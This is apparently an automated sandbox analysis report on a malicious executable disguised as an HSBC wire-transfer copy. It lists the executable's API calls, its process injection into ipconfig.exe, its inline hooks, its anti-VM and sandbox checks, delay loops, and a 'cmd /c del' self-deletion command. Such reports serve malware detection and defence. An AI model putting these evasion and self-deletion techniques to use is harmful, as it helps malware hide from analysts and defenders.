          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A490 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A410 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A3B2 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A35A NtCreateFile,
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.IdentifierJump to behavior
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess created: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC ... Wire Transfer Copy.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_01
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addbook.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addbook.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addbook.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addcustomer.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: views/addbook.baml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: /ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: S/ISectionEnt;component/views/addbook.xamli/ISectionEnt;component/views/borrowfrombookview.xaml_/ISectionEnt;component/views/borrowingview.xamlY/ISectionEnt;component/views/changebook.xamla/ISectionEnt;component/views/changecustomer.xaml]/ISectionEnt;component/views/customerview.xamla/ISectionEnt;component/views/deletecustomer.xamlW/ISectionEnt;component/views/errorview.xaml[/ISectionEnt;component/views/smallextras.xaml[/ISectionEnt;component/views/addcustomer.xaml
          Source: HSBC ... Wire Transfer Copy.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346858842.0000000001990000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC ... Wire Transfer Copy.exe, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346329666.0000000001600000.00000040.00000001.sdmp, ipconfig.exe, ipconfig.exe, 00000010.00000002.548146108.0000000003620000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.549823291.000000000373F000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: HSBC ... Wire Transfer Copy.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.HSBC ... Wire Transfer Copy.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.c00000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E92F5 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E9361 push ds; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_003E9347 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041EA76 push 1501B1CAh; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00416C20 push C10A24AAh; iretd
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_004164D3 push eax; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C092F5 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C09347 push ds; ret
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C09361 push ds; retf
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0167D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0369D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7EA76 push 1501B1CAh; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C764D3 push eax; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C76C20 push C10A24AAh; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7EDAE pushad ; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D56C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D502 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D50B push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.86790735928

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEF
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del "C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe"
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.2908f34.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HSBC ... Wire Transfer Copy.exe.299b518.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: HSBC ... Wire Transfer Copy.exe PID: 6892, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp, HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69904 second address: 0000000002C6990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002C69B7E second address: 0000000002C69B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 985 > 30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239841s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7036Thread sleep count: 1635 > 30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6896Thread sleep time: -36646s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239686s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239577s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239452s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239342s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239233s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -239124s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238999s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238889s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238781s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238670s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238560s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238453s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238343s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -238000s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -237203s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236703s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236534s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 7028Thread sleep time: -236406s >= -30000s
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe TID: 6936Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6628Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6264Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239841
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239686
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239577
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239452
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239342
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239233
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeThread delayed: delay time: 239124
